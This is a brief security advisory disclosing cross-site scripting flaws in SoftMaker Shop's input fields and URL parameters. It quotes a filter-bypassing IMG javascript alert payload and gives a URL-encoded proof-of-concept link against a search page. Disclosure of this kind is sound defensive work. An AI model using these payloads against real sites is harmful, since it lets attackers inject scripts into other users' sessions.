SoftMaker Shop is vulnerable to XSS

Inputs in the SoftMaker Shop is not properly sanitized, and XSS is possible in a lot of the systems input
fields and url parameters.

Some fields have been filtered in a basic form, so that simple scripting like
"<script>alert('XSS')</script>" is not possible. However, since the filtering is not based on white listing
you can conduct successful XSS attacks with code like "<IMG
SRC=javascript:alert(String.fromCharCode(88,83,83))>".

PoC:
http://www.example.example/shop/handle/varer/sok/resultat.asp?strSok=&#37;3CIMG+SRC&#37;3Djavascript&#37;3Aalert&#37;28&#37;26quot&#37;3BXSS&#37;26quot&#37;3B&#37;29&#37;3E&amp;valg=varer

Vendors site:http://www.softmaker.no

Please credit to: Preben Nylшkken